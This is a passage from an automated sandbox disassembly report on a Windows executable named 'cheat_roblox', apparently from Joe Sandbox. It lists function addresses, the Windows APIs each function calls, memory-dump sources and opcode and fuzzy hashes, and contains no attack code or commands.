                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1203560049-0
                                                                                                                  • Opcode ID: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
                                                                                                                  • Instruction ID: b98fae422bf4aafb47ee17d831d466088ff9cbbe024167dfdbff3b86c8307545
                                                                                                                  • Opcode Fuzzy Hash: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
                                                                                                                  • Instruction Fuzzy Hash: EA216233A1868681EA108B29F4453296361FB88BA4F500231EBFD87A95DF3DD541CB49
                                                                                                                  Function 00007FF6E7E4BF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1703294689-0
                                                                                                                  • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                                                  • Instruction ID: 170057f32a630f39ce84a83a2b3435e70a0d9816a8aea2e1bb0aa43653425cfa
                                                                                                                  • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                                                  • Instruction Fuzzy Hash: 05E04F26B0830946FB546B31EC9537923926F88B42F105438C8AEC3396DE3FA41A9746
                                                                                                                  Function 00007FF6E7E1F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E1F895
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E1F89B
                                                                                                                    • Part of subcall function 00007FF6E7E23EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6E7E30811), ref: 00007FF6E7E23EFD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3587649625-0
                                                                                                                  • Opcode ID: 1c0bb42e79c9fb00636deaf2d0e282c242ffc3b1dd605f464871389e3482b40a
                                                                                                                  • Instruction ID: c9c9f312ebf3b30c127ead60a604a8234aca10d6195a8b30c9002f8806090560
                                                                                                                  • Opcode Fuzzy Hash: 1c0bb42e79c9fb00636deaf2d0e282c242ffc3b1dd605f464871389e3482b40a
                                                                                                                  • Instruction Fuzzy Hash: 8191D173B19B8290EB10DF24D4413AD6361FB84798F904131EAAC87AE9DF7DD589C385
                                                                                                                  Function 00007FF6E7E13904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
                                                                                                                  • Instruction ID: 9fb02b27db3aab45591f563c3f77d0d880e0140f1921ca239bd17738a38a9f53
                                                                                                                  • Opcode Fuzzy Hash: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
                                                                                                                  • Instruction Fuzzy Hash: F141DF63F1465284FB00DBB5D4423BD2321AF44BD8F145235EEADA7ADADE3DD4868309
                                                                                                                  Function 00007FF6E7E22778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6E7E2274D), ref: 00007FF6E7E228A9
                                                                                                                  • GetLastError.KERNEL32(?,00007FF6E7E2274D), ref: 00007FF6E7E228B8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2976181284-0
                                                                                                                  • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                                                  • Instruction ID: 473fa050975436a3d5547a8731a2b9d81ba407cc253c84e0ae7c77aba54b2f24
                                                                                                                  • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                                                  • Instruction Fuzzy Hash: B231C523B19A9782EA644F2AF9407792358AF04BD4F150131DEBDCB790DE3EDD828746
                                                                                                                  Function 00007FF6E7E122BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1746051919-0
                                                                                                                  • Opcode ID: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
                                                                                                                  • Instruction ID: e19739eb5b65b8b5ccaa303e712fe0a35c2a602ed66512af572bb31bef60eee6
                                                                                                                  • Opcode Fuzzy Hash: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
                                                                                                                  • Instruction Fuzzy Hash: FE31D223B1878682EA109B25F84536EB364EF84790F444231EBEC47B95DF3DE545C709
                                                                                                                  Function 00007FF6E7E22AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$BuffersFlushTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1392018926-0
                                                                                                                  • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                                                  • Instruction ID: 8992a888d7e0f1096670409dedae380a566df195017a79c6a8f3d83f22871e27
                                                                                                                  • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                                                  • Instruction Fuzzy Hash: 6E210023E09B8350FA728F11F4043BA5794AF09794F164130DE9C47294EE3ED886C306
                                                                                                                  Function 00007FF6E7E2AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LoadString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2948472770-0
                                                                                                                  • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                                                  • Instruction ID: cbcb55d662983fd24f05e6547da19ec17adf7fb5eedea58ae4cd5ef0be5beda1
                                                                                                                  • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                                                  • Instruction Fuzzy Hash: 7F118E72B0874285EA40CF1AE84026877A1BB89FC0F544439CEADE3762EE7DE5418349
                                                                                                                  Function 00007FF6E7E22BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2976181284-0
                                                                                                                  • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                                                  • Instruction ID: b418eff50f1162bab8901ddb923f58224d8d1b3694142752f6b2bb49a649ab04
                                                                                                                  • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                                                  • Instruction Fuzzy Hash: 53117523A0C68281FB508B25F8423796264FB447B4F944331DABD972E5CF3ED996C306
                                                                                                                  Function 00007FF6E7E1255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$RectText$ClientWindowswprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 402765569-0
                                                                                                                  • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                                                  • Instruction ID: e518abbeafb2c6c8a084ad26ed748940285b6bf35fffe4c059bddfb3ab8b4e03
                                                                                                                  • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                                                  • Instruction Fuzzy Hash: 00011E22B0928F43FF599752E8A937957956F85744F084035D8ED862DADE2EE888830B
                                                                                                                  Function 00007FF6E7E2EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6E7E2EBAD,?,?,?,?,00007FF6E7E25752,?,?,?,00007FF6E7E256DE), ref: 00007FF6E7E2EB5C
                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6E7E2EB6F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1231390398-0
                                                                                                                  • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                                                  • Instruction ID: adde685787dfdde87cf56e04e2137dc760a6d09110fbde23c039347668500991
                                                                                                                  • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                                                  • Instruction Fuzzy Hash: 6BE02B62F1458B42DF188F65D4446E973D2BFC8B40F848135E64BC3614DE2DE5458B41
                                                                                                                  Function 00007FF6E7E421D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1173176844-0
                                                                                                                  • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                                                  • Instruction ID: a97026dbf0591b5513f78628f661dc78aa694a7164e8105317efdf1ca3eaad49
                                                                                                                  • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                                                  • Instruction Fuzzy Hash: 72E0EC42E1910742FD5863719C263B800680F59370E581730DAFED92C2FE1EA9A7A11E
                                                                                                                  Function 00007FF6E7E4D90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 588628887-0
                                                                                                                  • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                                                  • Instruction ID: 3075991e98cfe1199a5714d7e7aaca26fb1767de8ce84545e02d6e3425d02128
                                                                                                                  • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                                                  • Instruction Fuzzy Hash: 4DE08652E0D54386FF05EBB3F80537413D15F94750B040030CBADC6252FE3E9482920A
                                                                                                                  Function 00007FF6E7E133E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
                                                                                                                  • Instruction ID: 043d8b26f7b6fe629ce49a55448a9867175c52071265e9d54f2031d5aeae5ec0
                                                                                                                  • Opcode Fuzzy Hash: 8948bb9802c6c0987d886fae829bf96634841c4c74bd64b8e97cfea881f89bd5
                                                                                                                  • Instruction Fuzzy Hash: F6D1A463B0868696EB28CB25D5413BD7BA5FB05B84F040035CBBD877A5CF3EE4698706
                                                                                                                  Function 00007FF6E7E25294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1017591355-0
                                                                                                                  • Opcode ID: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                                                                                                                  • Instruction ID: 7eb34151d9d186fe65c91c7284deb527146b3d79de1e3095738d61bc142767f0
                                                                                                                  • Opcode Fuzzy Hash: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
                                                                                                                  • Instruction Fuzzy Hash: 1E61F713E0C6C781FA649B15CA1437A9291AF41BD0F245171EEEEC76C9FE7EE441A20B
                                                                                                                  Function 00007FF6E7E31870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E2E948: ReleaseSemaphore.KERNEL32 ref: 00007FF6E7E2E974
                                                                                                                    • Part of subcall function 00007FF6E7E2E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF6E7E2E993
                                                                                                                    • Part of subcall function 00007FF6E7E2E948: DeleteCriticalSection.KERNEL32 ref: 00007FF6E7E2E9AA
